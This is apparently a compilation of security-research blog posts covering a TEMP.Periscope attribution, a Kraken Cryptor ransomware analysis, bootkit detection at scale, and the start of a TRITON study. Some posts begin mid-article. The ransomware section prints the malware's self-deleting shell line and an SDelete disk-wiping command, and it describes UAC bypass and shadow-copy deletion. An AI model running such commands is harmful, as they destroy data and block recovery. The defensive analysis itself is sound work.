Recorded Future analysis on the spoofed domain revealed that this server hosted the SeDll Javascript loader SHA256: 146aa9a0ec013aa5bdba9ea9d29f59d48d43bc17c6a20b74bb8c521dbb5bc6f4, which had been used in August 2017 by Leviathan (also known as TEMP.Periscope) to execute another Javascript backdoor, AIRBREAK. Crucially, the first mention of Leviathan as a Chinese threat actor occurred in October 2017, meaning TEMP.Periscope was using the same infrastructure to target the U.K. engineering company six months earlier.

In November 2017, another spearphish leveraging Microsoft Equation Editor vulnerability CVE-2017-11882 was sent to the U.K. engineering company. This attack delivered a Cobalt Strike payload.

Conclusions and Outlook

The attempted spearphish has revealed a suite of TTPs that are linked to the recent activities of several different threat actors: APT28, Dragonfly, and TEMP.Periscope. We have listed the key TTPs observed in this attack in a chronological format in order to draw attention to the likelihood of techniques being copied from publicly disclosed reporting of these TTPs. These are summarized in the table below:

Observed TTPs

Summary of observed TTPs used in attacks and links to similar APT TTPs.

Given that most of the listed APT28, Dragonfly, and TEMP.Periscope TTPs have already been published, we believe there are three likely scenarios for the activity observed:

  1. A Russian threat actor was responsible and borrowed TEMP.Periscope TTPs.
  2. TEMP.Periscope was responsible and borrowed Russian threat actor TTPs.
  3. Another threat actor was responsible that used TTPs from the Russian groups and TEMP.Periscope.

In order to assess which of the three hypotheses above best explains our observations, we assessed the accumulated evidence detailed in this report.

First, we are certain that the attacker used IP 193.180.255[.]2 as a VPN endpoint to send the spearphish because the IP address resolves to Swedish VPN service PrivateVPN. We are also certain that the device that sent the spearphish was associated with the WIN-AB2I27TG6FK hostname. Further, we can state that this hostname was used in the filename of several files hosted on a known TEMP.Periscope C2, which had an open directory. As outlined earlier in this report, we believe the sender of the spearphish, WIN-AB2I27TG6FK, is probably the hostname of the TEMP.Periscope open directory hosted at scsnewstoday[.]com.

The spearphish was sent on July 6, 2018. Just a few days later, FireEye reported on a TEMP.Periscope campaign targeting the Cambodian elections in July 2018 that used the open directory hosted on scsnewstoday[.]com as a C2. The report noted that the same infrastructure was likely active since at least April 2017.

Secondly, the “file://” path included in the spearphish linking to the C2 82.118.242[.]243 was designed to steal credentials over SMB. This technique was documented publicly as a Dragonfly threat actor TTP by the US-CERT in March 2018, almost four months before the observed attack.

The observed hostname on the 82.118.242[.]243 IP was WIN-PRH492RQAFV, which we found was hard coded in a forked Responder script on GitHub. The original Responder script has previously been used by another Russian threat actor, APT28, according to reporting published in August 2017.

Recorded Future Timeline of TTP Activity

Timeline of selected APT28, Dragonfly, and TEMP.Periscope TTP disclosures and activity.

TEMP.Periscope has been actively followed by the research community since at least October 2017 — two months after APT28’s use of Responder was disclosed by FireEye in August 2017.2 There has since been a flurry of reporting on TEMP.Periscope activity in 2018, with campaigns against American and European maritime engineering companies and the Cambodian government. We should note here that the spearphish we observed was also sent to an email account that contained the name of a journalist based in Cambodia and was sent from an account spoofing an Australian journalist that had previously reported on Cambodian topics.

Therefore, it is plausible that, with the timeline of Russian tooling being made public prior to the disclosure of the TEMP.Periscope campaigns, TEMP.Periscope adapted their TTPs to either hinder attribution efforts or to simply use techniques that they deemed would be effective.

The overlap in infrastructure with the scsnewstoday[.]com C2 domain is also key; the domain was publicly reported by FireEye as being used by TEMP.Periscope only a few days after the spearphish to the U.K. engineering company was sent, making it highly unlikely that another threat actor could have compromised the C2. Additionally, the longer-term targeting of the U.K. engineering company by TEMP.Periscope since at least May 2017 highlights the group’s persistence in attempting to gain access.

Based on the available data and evidence outlined in this report, Recorded Future assesses with medium confidence that Chinese threat actor TEMP.Periscope reused TTPs from other threat groups to target the U.K. engineering company, likely to gain access to their sensitive and proprietary technologies and data. TEMP.Periscope has demonstrated an ability to rapidly adapt its TTPs to learn from other groups, such as APT28 and Dragonfly, either to increase their chances of success in gaining access to the victim network or to obfuscate attribution attempts.

Recorded Future expects TEMP.Periscope to continue to target organizations in the high-tech defense and engineering sectors. The Chinese strategic requirement to develop advanced technology, particularly in marine engineering, remains an intense focus as China looks to dominate the South China Sea territory. We believe TEMP.Periscope will continue to use commodity malware because it is still broadly successful and relatively low cost for them to use. They will continue to observe “trending” vulnerabilities to exploit and use techniques that have been publicly reported in order to gain access to victim networks.

Finally, Recorded Future believes that threat actors are actively emulating each other, monitoring publications and data sources both to protect their infrastructure and to observe techniques that rival actors are using. We anticipate that adversaries will continue to plant false flags, either via technical means (as observed in the Olympic Destroyer campaign) or with technique emulation. As means of detection have drastically improved, the public identification of code overlap and the mapping of TTPs plays into the hands of well-coordinated operations, which can now make attribution findings murky at best. The samples and techniques named in a report can now rapidly be transposed into new or ongoing campaigns due to the volume of public reporting on these issues. This muddying of the waters allows targeted campaigns to better blend in with the noise, attempting to blur the lines between adversary groups.

Network Defense Recommendations

Recorded Future recommends organizations conduct the following measures when defending against TEMP.Periscope’s attempts to steal credentials to gain network access:

  • Configure your intrusion detection systems (IDS), intrusion prevention systems (IPS), or any network defense mechanisms in place to alert on — and upon review, consider blocking illicit connection attempts from — the external IP addresses and domains listed in Appendix A.
  • Include the provided Snort rules in Appendix B in IDS and IPS appliances to detect attempted SMB credential stealing. Also, if applicable, use the provided Bro queries in Appendix B to hunt for signs of TEMP.Periscope TTPs detailed in this report on your network.
  • Use Recorded Future’s API to import indicators listed in this report (Appendix A) into your endpoint detection and response (EDR) platform.
  • Configure endpoint detection and response traffic to alert and block connections to indicators in Appendix A.
  • Utilize the provided Yara rule in Appendix C to search your network for evidence of the spearphish being sent to your organization.
  • Monitor and restrict SMB traffic across your network, particularly external attempts to authenticate via SMB.

To view a full list of the associated indicators of compromise, download the appendix.

1P4wnP1 is a highly customizable USB attack platform based on a Raspberry Pi Zero computer.

2 F-Secure published research in August 2016 on their investigations into the NanHaiShu RAT, which has since been attributed to TEMP.Periscope (Leviathan).

The post Chinese Threat Actor TEMP.Periscope Targets UK-Based Engineering Company Using Russian APT Techniques appeared first on Recorded Future.

     

Kraken Cryptor Ransomware Gains Popularity Among Cybercriminals

Insikt Group

Co-Authored by Marc Rivero López and John Fokker of McAfee

Click here to download the complete analysis as a PDF.

Scope Note: Insikt Group used the Recorded Future product and dark web analysis to track the activity of threat actor ThisWasKraken, who operates the Kraken Cryptor ransomware affiliate program on a top-tier Russian-speaking criminal forum.

Insikt Group collaborated with researchers at McAfee. Ransomware continually represents a major risk to organizations, and the target audience of this research includes day-to-day security practitioners as well as executive decision makers.

Click here to read the McAfee report.

Executive Summary

Kraken Cryptor is a ransomware-as-a-service (RaaS) affiliate program that was introduced on August 16, 2018, on a top-tier Russian-speaking cybercriminal forum by the threat actor ThisWasKraken. Kraken Cryptor has gained popularity among members of the dark web, has been used to target users of the popular antivirus program SuperAntiSpyware, and has also been distributed through the Fallout exploit kit.

Key Judgments

  • The Kraken Cryptor ransomware was first seen in the wild in August 2018.
  • Kraken is distributed by members of an affiliate program operated by ThisWasKraken, who is only active on Russian criminal forums.
  • To distribute malware, ThisWasKraken and/or its affiliates likely use the Fallout exploit kit.
  • We have identified that ThisWasKraken is using online casino BitcoinPenguin to launder illicitly gained funds.
  • Insikt Group assesses with a high degree of confidence that ThisWasKraken works within a team, whose members could be residing in Iran, Brazil, or former Soviet bloc countries.

Background

The Kraken Cryptor ransomware is a connectionless strain of ransomware that communicates with victims via email in place of any command and control (C2) infrastructure or landing pages. Kraken was first observed in the wild in August 2018 and gained notoriety when it was distributed from the compromised website of SuperAntiSpyware, disguised as the antivirus program.1 Kraken has also been distributed to victims via spam and malvertising campaigns, some of which redirect to the Fallout exploit kit for the final installation phase.

Insikt Group has attributed the Kraken Cryptor ransomware to the threat actor ThisWasKraken, who operates the affiliate program that gives other actors access to Kraken for distribution. ThisWasKraken is relatively new to the dark web and is exclusively active on a Russian criminal forum, where the actor registered on August 12, 2018. The actor communicates using Russian and English; however, the analysis of their forum posts indicate that ThisWasKraken is neither a native Russian nor English speaker. To make forum posts in Russian, the actor likely uses automated translation services, as is evident by the awkward phrasing indicative of such a service. In contrast, the actor is noticeably more proficient in English, though they make mistakes consistently in both sentence structure and spelling.

Kraken Cryptor Advertisement

Advertisement for the Kraken Cryptor v2 affiliate program on a criminal forum.

The Kraken Cryptor ransomware is not sold to users on a one-time basis. It is instead operated as an affiliate program that distributes builds of the ransomware to its participants, who in turn repay a percentage of the income earned from ransom payments. This technique of ransomware distribution, known as ransomware-as-a-service (RaaS), is commonly used on the dark web by cybercriminals because of its efficiency. ThisWasKraken calls the service the Kraken Cryptor v2 affiliate program, or Kraken ransomware-as-a-service, which was last updated on October 21. The latest version of the Kraken Cryptor is v.2.0.7.

Kraken Cryptor Ransom Note

Kraken Cryptor ransomware v.2.0.7 ransom note with instructions for how to decrypt infected files.

At the time of this report, the Kraken Cryptor ransomware-as-a-service (RaaS) required all potential affiliate partners to pay $50 per payload. Below are some of the terms and conditions of the affiliate program:

  • Affiliates receive 80 percent of the paid ransom.
  • The program can reject any member or candidate without explanation.
  • Affiliates receive a 24/7 support service.
  • Submitting Kraken sample files to antivirus services is forbidden.
  • The service provides no refunds for purchased payloads.

Kraken Cryptor Ransomware

ThisWasKraken introduced the Kraken Cryptor ransomware on a criminal forum on August 16, 2018.

Threat Analysis

According to ThisWasKraken, the Kraken Cryptor RaaS does not allow the targeting of the following former Soviet bloc countries:

  • Armenia
  • Azerbaijan
  • Belarus
  • Estonia
  • Georgia
  • Kyrgyzstan
  • Kazakhstan
  • Lithuania
  • Latvia
  • Moldova
  • Russia
  • Tajikistan
  • Turkmenistan
  • Ukraine
  • Uzbekistan

In addition to the countries listed above, the latest samples of Kraken that have been identified in the wild no longer affect victims in Syria, Brazil, and Iran, suggesting that ThisWasKraken (or their associates) may have some connection to Brazil and Iran, though this is not confirmed. It is likely that Syria was added following the plea for help from a victim whose computer was infected by another ransomware called GandCrab.

According to the map of infections provided below, we can still see a minor level of infections in excluded countries, despite specific fail-safe controls put in place by Kraken developers.

Each affiliate of Kraken Cryptor RaaS receives a unique build of Kraken and must send the following information to ThisWasKraken to be configured:

  • A primary email address to communicate with victims
  • An alternative email address to communicate with victims
  • A ransom amount in Bitcoin, usually varying from 0.075 to 1.25 BTC
  • A list of countries not to target

The analysis of the actor’s communication suggests that ThisWasKraken is likely part of a team and not personally involved in the development of the ransomware directly. The actor’s role is customer facing, which is accomplished through the Jabber account thiswaskraken@exploit[.]im. Communications with ThisWasKraken show that the actor refers all technical issues to the product support team at the email address teamxsupport@protonmail[.]com.

Bitcoin is the only currency the affiliate program uses, and Insikt Group identified several wallets associated with the operation. Interestingly, it appears that Kraken’s developers choose BitcoinPenguin, an online gambling site, as the primary money laundering conduit. Although not unusual, it is still very uncommon for criminal actors — specifically ransomware operators — to depart from more traditional cryptocurrency exchangers when laundering stolen funds. It is likely that one of the decisive factors for this unusual choice was due to the fact that BitcoinPenguin does not require any identity verification of its members, allowing anyone to maintain an anonymous cryptocurrency wallet there. Cryptocurrency exchangers are continuing to stiffen their registration rules in response to regulatory demands, but online crypto casinos do not have to follow the same “know your customer” (KYC) guidelines, providing a convenient loophole for all kinds of money launderers.

Bitcoin Transactions

Bitcoin transactions associated with Kraken and analyzed with the Crystal Blockchain software.

On October 4, 2018, BleepingComputer reported that the Fallout exploit kit was being used to deliver the Kraken Cryptor ransomware v.1.5. It should be noted that on multiple occasions, ThisWasKraken mentioned the Fallout exploit kit and praised it for its high infection rate. At one point, ThisWasKraken even stated, “One of our partners joined the Fallout exploit kit, which is good for us.” Also, other forum messages indicate that ThisWasKraken purchased hijacked web traffic, which may be the same traffic responsible for Kraken infections from the Fallout exploit kit.

Web Traffic Graphic

Graphic posted by ThisWasKraken showing web traffic used to distribute the Kraken Cryptor RaaS by country.

Below are the technical specifications of the the Kraken Cryptor ransomware v.2.0.7 posted by ThisWasKraken on October 21, 2018:

  • The ransomware is written in C# (NET. Framework v. 3.5).
  • The ransomware works offline and supports communication via email.
  • The size of the payload is around 85 KB, but antivirus analysis indicates that the payload size often reaches up to 94 KB.
  • Kraken primarily targets Windows OS versions 8, 8.1, and 10.
  • Kraken has a high speed of encryption.
  • There is no file size limit for encryption process.
  • The ransomware collects system information when victims are online.
  • Kraken uses a hybrid encryption algorithm, including AES-128/256 (CBC mode), as well as other ciphers (RSA, Salsa20, RC4).
  • The ransomware uses a smart obfuscation encryption method to target random positions of files, including network sharing encryption.
  • The ransomware encrypts storage devices on shared networks.
  • It is impossible to recover without paying the ransom.
  • Anti-debugging and anti-forensics tools are included in the package.
  • Ransom messages are available in 15 languages in HTML and TXT formats.
  • “Canary trap” anti-ransomware bypass methods are applied to identify key leaks.
  • Infection statistics are based on IPs.

Affiliates are given a new build of Kraken every 15 days to keep the payload fully undetectable (FUD) from antivirus software. According to ThisWasKraken, when a victim asks for a free decryption test, the affiliate member should send one of the victim’s files with its associated unique key to the Kraken Cryptor ransomware support service. The service will decrypt the file and resend it to the affiliate member to forward to the victim. After the victim pays the full ransom, the affiliate member sends 20 percent of the received payment to the RaaS to get a decryptor key, which is then forwarded on to the victim. This system ensures the affiliate pays their percentage to the affiliate program and does not simply pocket the full amount for themselves.

Technical Analysis

The following technical analysis was conducted by McAfee’s Advanced Threat Research team and the results were shared with Recorded Future.

The Kraken Cryptor ransomware encrypts data on the disk very quickly and uses external tools, such as SDelete from the Sysinternals Suite, to wipe files, making file recovery harder.

Kraken Cryptor Infection Scheme

The Kraken Cryptor infection scheme through the Fallout exploit kit.

The ransomware implements a user account control (UAC) bypass using the Windows Event Viewer. This bypass technique is used by other malware families and is quite effective for executing malware.

Ransomware Using Windows Event Viewer

The ransomware uses Windows Event Viewer to bypass UAC.

The technique is well explained in an article by blogger enigma0x3.

McAfee analyzed an early subset of Kraken ransomware samples and determined that they were still in the testing phase, adding and removing options. The ransomware implemented a “protection” to delete itself during the infection phase:

  • C:\Windows\System32\cmd.exe” /C ping 127.0.0.1 -n 3 > NUL&&del /Q /F /S
  • C:\Users\Administrator\AppData\Local\Temp\krakentemp0000.exe

This step is to prevent researchers and endpoint protections from catching the file on an infected machine.

Kraken encrypts user files with a random name and drops the ransom note demanding that the victim pay to recover them. Each file extension is different; this technique is often used by specific ransomware families to bypass endpoint protection systems.

Kraken, delivered by the exploit kit, bypasses the UAC using Event Viewer, drops a file on the system, and executes it through the UAC bypass method.

Exploit Kit Delivering Binary

The binary delivered by the exploit kit.

During the compilation of the first versions, the authors of the binary forgot to delete the PDB reference, revealing that the file has a relationship with Kraken Cryptor.

Ransomware Early Version

An early version of the ransomware with the path on Disk C.

The early versions contained the following path:

  • C:\Users\Krypton\source\repos\UAC\UAC\obj\\Release\UAC.pdb

Later versions “dropped” the PDB path together with the Kraken loader.

Using Sysinternals Tools for Harder File Recovery

One unique feature of this ransomware family is the use of SDelete. Kraken uses a .bat file to perform certain operations, making file recovery much more challenging:

Kraken Cryptor

Kraken Cryptor v.1.6 with SDelete bat file makes file recovery harder.

Kraken downloads SDelete from the Sysinternals website, adds the registry key, accepting the EULA to avoid the pop up, and executes it with the following arguments:
sdelete.exe -c -z C

The SDelete batch file makes file recovery much harder by overwriting all free space on the drive with zeros, deleting the Volume Shadow Copies, disabling the recovery reboot option, and finally, rebooting the system after 300 seconds.

Netguid Comparison

Earlier versions of Kraken were delivered by a loader before it moved to a direct execution method. The loader we examined contained a specific netguid. With this, McAfee found additional samples of the Kraken loader on VirusTotal:

Kraken Cryptor

Additional hash values found on VirusTotal.

Not only did the loader have a specific netguid, but the compiled versions of Kraken also shared a netguid, making it possible to continue hunting samples:

Additional Hash Values

Additional hash values detected.

Comparing Versions

Kraken uses a configuration file in every version to set the variables for the ransomware. This file is easily extracted for additional analysis.

Kraken Cryptor Configuration File

Image of the configuration file of Kraken Cryptor.

Based on the configuration file, McAfee discovered nine versions of Kraken:

  • 1.2
  • 1.3
  • 1.5
  • 1.5.2
  • 1.5.3
  • 1.6
  • 2.0
  • 2.0.4
  • 2.0.7

By extracting the configuration files from all of the versions, McAfee built the following overview of features (the checkmark means the feature is present):

Feature Overview

Overview of the features of all identified versions of the ransomware.

All of the versions we examined mostly contain the same options, differing only in some of the anti-virtual protection and anti-forensic capabilities. The latest version, Kraken 2.0.7, changed its configuration scheme and is covered later.

Other differences in Kraken’s configuration file include the list of countries excluded from encryption. The standouts are Brazil and Syria, which were not named in the original forum advertisement.

Having an exclusion list is a common method for cybercriminals to avoid prosecution. Brazil’s addition to the list in Version 1.5 suggests the involvement of a Brazilian affiliate. The following table shows the exclusion list by country and version (the checkmark means the country appears on the list):

Exclusion List

Exclusion list by country and version indicates the list of countries that are not allowed to attack.

All of the Kraken releases have excluded the same countries, except for Brazil, Iran, and Syria.2

Version 2.0.7

The most recent version examined comes with a different configuration scheme:

Configuration Version

Configuration version of the Kraken Cryptor v. 2.0.7.

This release has more options. McAfee expects this malware will be more configurable than other active versions.

APIs and Statistics

One of the new features is a public API to track the number of victims:

Public API

Public API to track the number of victims. Source: Bleeping Computer

Another API is a hidden service to track certain statistics:

Statistics Collection

Statistics collection and monitoring site that likely does not have the functionality of a typical C2 panel.

The Onion URL can easily be found in the binary:

Detected URL

kraken656kn6wyyx[.]onion URL detected using the API.

The endpoint and browser that Kraken uses is hardcoded in the configuration file:

Configuration File

The configuration file contains data about the endpoint and browser.

Kraken gathers the following information from every infection:

  • Status
  • Operating System
  • Username
  • Hardware ID
  • IP Address
  • Country
  • City
  • Language
  • HDCount
  • HDType
  • HDName
  • HDFull
  • HDFree
  • Privilege
  • Operate
  • Beta

Kraken Infrastructure

In versions 1.2 through 2.04, Kraken contacts blasze[.]tk to download additional files. The site is has Cloudflare protection to mitigate DDoS attacks.

Downloading Additional Files

Kraken Cryptor used blasze[.]tk website to download additional files for versions 1.2 through 2.04.

This domain is not accessible from the following countries:

Countries Blocking Domain

Countries that block the domain blasze[.]tk.

Insikt Group was able to obtain a sample of the Kraken Cryptor ransomware and successfully encrypt and then decrypt a 64-bit Windows 7 machine. The encryption phase locked all target files, and, in those directories, placed a ransom note in HTML format with instructions for the victim. The note first instructs the victim to buy Bitcoin through LocalBitcoins.com or BestBitcoinExchange.io, and then to contact the primary or secondary email address listed for further instructions. Obviously, the infected machine still has access to its web browsers, so the victim can communicate with the attacker and pay the ransom.

Ransom Note

Partial screenshot of the ransom note left by Kraken.

When the victim pays the ransom, they receive an email containing a link for the file-sharing service Uploadfiles.io that in turn downloads two files, Decryptor.exe and Private.txt. Private.txt contains two datasets: a private key and a private IV. When the program Decryptor.exe is executed, it requires the victim to copy and paste the private key and private IV into the respective fields in order to decrypt the files on their machine.

Kraken Decryptor

Screenshot of the Kraken decryptor sent to the victim after payment.

Outlook

The Kraken Cryptor ransomware is a 32-bit malware written using .NET Framework and protected with SmartAssembly, a commercial obfuscator that protects an application against reverse engineering. The malware is fully customizable through a JavaScript Object Notation (JSON) file that is likely generated by its builder.

The existence of the list of countries that are not allowed to be targeted indicates that the members of this possible international hacking group may reside in these nations. Such behavior is usually considered as a security step by the criminals who do not want to be searched by local law enforcement agencies. Considering that ThisWasKraken is not a native English or Russian speaker, the possible residence of the actor may be Brazil or Iran.

To view a full list of the associated indicators of compromise, download the appendix.

1It should be noted that the Kraken Cryptor ransomware is different from the Kraken ransomware widely distributed in 2016, and is not linked to another ransomware strain detected in 2013 that used the “.kraken” extension.

2McAfee believes that the creators of Kraken had the same change of heart as the actors behind GandCrab, who recently released decryption keys for Syrian victims after a tweet claimed they had no money to pay the ransoms.

The post Kraken Cryptor Ransomware Gains Popularity Among Cybercriminals appeared first on Recorded Future.

     

BIOS Boots What? Finding Evil in Boot Code at Scale!

The second issue is that reverse engineering all boot records is impractical. Given the job of determining if a single system is infected with a bootkit, a malware analyst could acquire a disk image and then reverse engineer the boot bytes to determine if anything malicious is present in the boot chain. However, this process takes time and even an army of skilled reverse engineers wouldn’t scale to the size of modern enterprise networks. To put this in context, the compromised enterprise network referenced in our ROCKBOOT blog post had approximately 10,000 hosts. Assuming a minimum of two boot records per host, a Master Boot Record (MBR) and a Volume Boot Record (VBR), that is an average of 20,000 boot records to analyze! An initial reaction is probably, “Why not just hash the boot records and only analyze the unique ones?” One would assume that corporate networks are mostly homogeneous, particularly with respect to boot code, yet this is not the case. Using the same network as an example, the 20,000 boot records reduced to only 6,000 unique records based on MD5 hash. Table 1 demonstrates this using data we’ve collected across our engagements for various enterprise sizes.

Enterprise Size (# hosts)

Avg # Unique Boot Records (md5)

100-1000

428

1000-10000

4,738

10000+

8,717

Table 1 – Unique boot records by MD5 hash

Now, the next thought might be, “Rather than hashing the entire record, why not implement a custom hashing technique where only subsections of the boot code are hashed, thus avoiding the dynamic data portions?” We tried this as well. For example, in the case of Master Boot Records, we used the bytes at the following two offsets to calculate a hash:

md5( offset[0:218] + offset[224:440] )

In one network this resulted in approximately 185,000 systems reducing to around 90 unique MBR hashes. However, this technique had drawbacks. Most notably, it required accounting for numerous special cases for applications such as Altiris, SafeBoot, and PGPGuard. This required small adjustments to the algorithm for each environment, which in turn required reverse engineering many records to find the appropriate offsets to hash.

Ultimately, we concluded that to solve the problem we needed a solution that provided the following:

  • A reliable collection of boot records from systems
  • A behavioral analysis of boot records, not just static analysis
  • The ability to analyze tens of thousands of boot records in a timely manner

The remainder of this post describes how we solved each of these challenges.

Collect the Bytes

Malicious drivers insert themselves into the disk driver stack so they can intercept disk I/O as it traverses the stack. They do this to hide their presence (the real bytes) on disk. To address this attack vector, we developed a custom kernel driver (henceforth, our “Raw Read” driver) capable of targeting various altitudes in the disk driver stack. Using the Raw Read driver, we identify the lowest level of the stack and read the bytes from that level (Figure 1).


Figure 1: Malicious driver inserts itself as a filter driver in the stack, raw read driver reads bytes from lowest level

This allows us to bypass the rest of the driver stack, as well as any user space hooks. (It is important to note, however, that if the lowest driver on the I/O stack has an inline code hook an attacker can still intercept the read requests.) Additionally, we can compare the bytes read from the lowest level of the driver stack to those read from user space. Introducing our first indicator of a compromised boot system: the bytes retrieved from user space don’t match those retrieved from the lowest level of the disk driver stack.

Analyze the Bytes

As previously mentioned, reverse engineering and static analysis are impractical when dealing with hundreds of thousands of boot records. Automated dynamic analysis is a more practical approach, specifically through emulating the execution of a boot record. In more technical terms, we are emulating the real mode instructions of a boot record.

The emulation engine that we chose is the Unicorn project. Unicorn is based on the QEMU emulator and supports 16-bit real mode emulation. As boot samples are collected from endpoint machines, they are sent to the emulation engine where high-level functionality is captured during emulation. This functionality includes events such as memory access, disk reads and writes, and other interrupts that execute during emulation.

The Execution Hash

Folding down (aka stacking) duplicate samples is critical to reduce the time needed on follow-up analysis by a human analyst. An interesting quality of the boot samples gathered at scale is that while samples are often functionally identical, the data they use (e.g. strings or offsets) is often very different. This makes it quite difficult to generate a hash to identify duplicates, as demonstrated in Table 1. So how can we solve this problem with emulation? Enter the “execution hash”. The idea is simple: during emulation, hash the mnemonic of every assembly instruction that executes (e.g., “md5(‘and’ + ‘mov’ + ‘shl’ + ‘or’)”). Figure 2 illustrates this concept of hashing the assembly instruction as it executes to ultimately arrive at the “execution hash”


Figure 2: Execution hash

Using this method, the 650,000 unique boot samples we’ve collected to date can be grouped into a little more than 300 unique execution hashes. This reduced data set makes it far more manageable to identify samples for follow-up analysis. Introducing our second indicator of a compromised boot system: an execution hash that is only found on a few systems in an enterprise!

Behavioral Analysis

Like all malware, suspicious activity executed by bootkits can vary widely. To avoid the pitfall of writing detection signatures for individual malware samples, we focused on identifying behavior that deviates from normal OS bootstrapping. To enable this analysis, the series of instructions that execute during emulation are fed into an analytic engine. Let's look in more detail at an example of malicious functionality exhibited by several bootkits that we discovered by analyzing the results of emulation.

Several malicious bootkits we discovered hooked the interrupt vector table (IVT) and the BIOS Data Area (BDA) to intercept system interrupts and data during the boot process. This can provide an attacker the ability to intercept disk reads and also alter the maximum memory reported by the system. By hooking these structures, bootkits can attempt to hide themselves on disk or even in memory.

These hooks can be identified by memory writes to the memory ranges reserved for the IVT and BDA during the boot process. The IVT structure is located at the memory range 0000:0000h to 0000:03FCh and the BDA is located at 0040:0000h. The malware can hook the interrupt 13h handler to inspect and modify disk writes that occur during the boot process. Additionally, bootkit malware has been observed modifying the memory size reported by the BIOS Data Area in order to potentially hide itself in memory.

This leads us to our final category of indicators of a compromised boot system: detection of suspicious behaviors such as IVT hooking, decoding and executing data from disk, suspicious screen output from the boot code, and modifying files or data on disk.

Do it at Scale

Dynamic analysis gives us a drastic improvement when determining the behavior of boot records, but it comes at a cost. Unlike static analysis or hashing, it is orders of magnitude slower. In our cloud analysis environment, the average time to emulate a single record is 4.83 seconds. Using the compromised enterprise network that contained ROCKBOOT as an example (approximately 20,000 boot records), it would take more than 26 hours to dynamically analyze (emulate) the records serially! In order to provide timely results to our analysts we needed to easily scale our analysis throughput relative to the amount of incoming data from our endpoint technologies. To further complicate the problem, boot record analysis tends to happen in batches, for example, when our endpoint technology is first deployed to a new enterprise.

With the advent of serverless cloud computing, we had the opportunity to create an emulation analysis service that scales to meet this demand – all while remaining cost effective. One of the advantages of serverless computing versus traditional cloud instances is that there are no compute costs during inactive periods; the only cost incurred is storage. Even when our cloud solution receives tens of thousands of records at the start of a new customer engagement, it can rapidly scale to meet demand and maintain near real-time detection of malicious bytes.

The cloud infrastructure we selected for our application is Amazon Web Services (AWS). Figure 3 provides an overview of the architecture.


Figure 3: Boot record analysis workflow

Our design currently utilizes:

  • API Gateway to provide a RESTful interface.
  • Lambda functions to do validation, emulation, analysis, as well as storage and retrieval of results.
  • DynamoDB to track progress of processed boot records through the system.
  • S3 to store boot records and emulation reports.

The architecture we created exposes a RESTful API that provides a handful of endpoints. At a high level the workflow is:

  1. Endpoint agents in customer networks automatically collect boot records using FireEye’s custom developed Raw Read kernel driver (see “Collect the bytes” described earlier) and return the records to FireEye’s Incident Response (IR) server.
  2. The IR server submits batches of boot records to the AWS-hosted REST interface, and polls the interface for batched results.
  3. The IR server provides a UI for analysts to view the aggregated results across the enterprise, as well as automated notifications when malicious boot records are found.

The REST API endpoints are exposed via AWS’s API Gateway, which then proxies the incoming requests to a “submission” Lambda. The submission Lambda validates the incoming data, stores the record (aka boot code) to S3, and then fans out the incoming requests to “analysis” Lambdas.

The analysis Lambda is where boot record emulation occurs. Because Lambdas are started on demand, this model allows for an incredibly high level of parallelization. AWS provides various settings to control the maximum concurrency for a Lambda function, as well as memory/CPU allocations and more. Once the analysis is complete, a report is generated for the boot record and the report is stored in S3. The reports include the results of emulation and other metadata extracted from the boot record (e.g., ASCII strings).

As described earlier, the IR server periodically polls the AWS REST endpoint until processing is complete, at which time the report is downloaded.

Find More Evil in Big Data

Our workflow for identifying malicious boot records is only effective when we know what malicious indicators to look for, or what execution hashes to blacklist. But what if a new malicious boot record (with a unique hash) evades our existing signatures?

For this problem, we leverage our in-house big data platform engine that we integrated into FireEye Helix following the acquisition of X15 Software. By loading the results of hundreds of thousands of emulations into the engine X15, our analysts can hunt through the results at scale and identify anomalous behaviors such as unique screen prints, unusual initial jump offsets, or patterns in disk reads or writes.

This analysis at scale helps us identify new and interesting samples to reverse engineer, and ultimately helps us identify new detection signatures that feed back into our analytic engine.

Conclusion

Within weeks of going live we detected previously unknown compromised systems in multiple customer environments. We’ve identified everything from ROCKBOOT and HDRoot! bootkits to the admittedly humorous JackTheRipper, a bootkit that spreads itself via floppy disk (no joke). Our system has collected and processed nearly 650,000 unique records to date and continues to find the evil needles (suspicious and malicious boot records) in very large haystacks.

In summary, by combining advanced endpoint boot record extraction with scalable serverless computing and an automated emulation engine, we can rapidly analyze thousands of records in search of evil. FireEye is now using this solution in both our Managed Defense and Incident Response offerings.

Acknowledgements

Dimiter Andonov, Jamin Becker, Fred House, and Seth Summersett contributed to this blog post.

A Totally Tubular Treatise on TRITON and TriStation

Introduction

In December 2017, FireEye's Mandiant discussed an incident response involving the TRITON framework. The TRITON attack and many of the publicly discussed ICS intrusions involved routine techniques where the threat actors used only what is necessary to succeed in their mission. For both INDUSTROYER and TRITON, the attackers moved from the IT network to the OT (operational technology) network through systems that were accessible to both environments. Traditional malware backdoors, Mimikatz distillates, remote desktop sessions, and other well-documented, easily-detected attack methods were used throughout these intrusions.

Despite the routine techniques employed to gain access to an OT environment, the threat actors behind the TRITON malware framework invested significant time learning about the Triconex Safety Instrumented System (SIS) controllers and TriStation, a proprietary network communications protocol. The investment and purpose of the Triconex SIS controllers leads Mandiant to assess the attacker's objective was likely to build the capability to cause physical consequences.

TriStation remains closed source and there is no official public information detailing the structure of the protocol, raising several questions about how the TRITON framework was developed. Did the actor have access to a Triconex controller and TriStation 1131 software suite? When did development first start? How did the threat actor reverse engineer the protocol, and to what extent? What is the protocol structure?

FireEye’s Advanced Practices Team was born to investigate adversary methodologies, and to answer these types of questions, so we started with a deeper look at the TRITON’s own Python scripts.

Glossary:

  • TRITON – Malware framework designed to operate Triconex SIS controllers via the TriStation protocol.
  • TriStation – UDP network protocol specific to Triconex controllers.
  • TRITON threat actor – The human beings who developed, deployed and/or operated TRITON.

Diving into TRITON's Implementation of TriStation

TriStation is a proprietary network protocol and there is no public documentation detailing its structure or how to create software applications that use TriStation. The current TriStation UDP/IP protocol is little understood, but natively implemented through the TriStation 1131 software suite. TriStation operates by UDP over port 1502 and allows for communications between designated masters (PCs with the software that are “engineering workstations”) and slaves (Triconex controllers with special communications modules) over a network.

To us, the Triconex systems, software and associated terminology sound foreign and complicated, and the TriStation protocol is no different. Attempting to understand the protocol from ground zero would take a considerable amount of time and reverse engineering effort – so why not learn from TRITON itself? With the TRITON framework containing TriStation communication functionality, we pursued studying the framework to better understand this mysterious protocol. Work smarter, not harder, amirite?

The TRITON framework has a multitude of functionalities, but we started with the basic components:

  • TS_cnames.pyc # Compiled at: 2017-08-03 10:52:33
  • TsBase.pyc # Compiled at: 2017-08-03 10:52:33
  • TsHi.pyc # Compiled at: 2017-08-04 02:04:01
  • TsLow.pyc # Compiled at: 2017-08-03 10:46:51

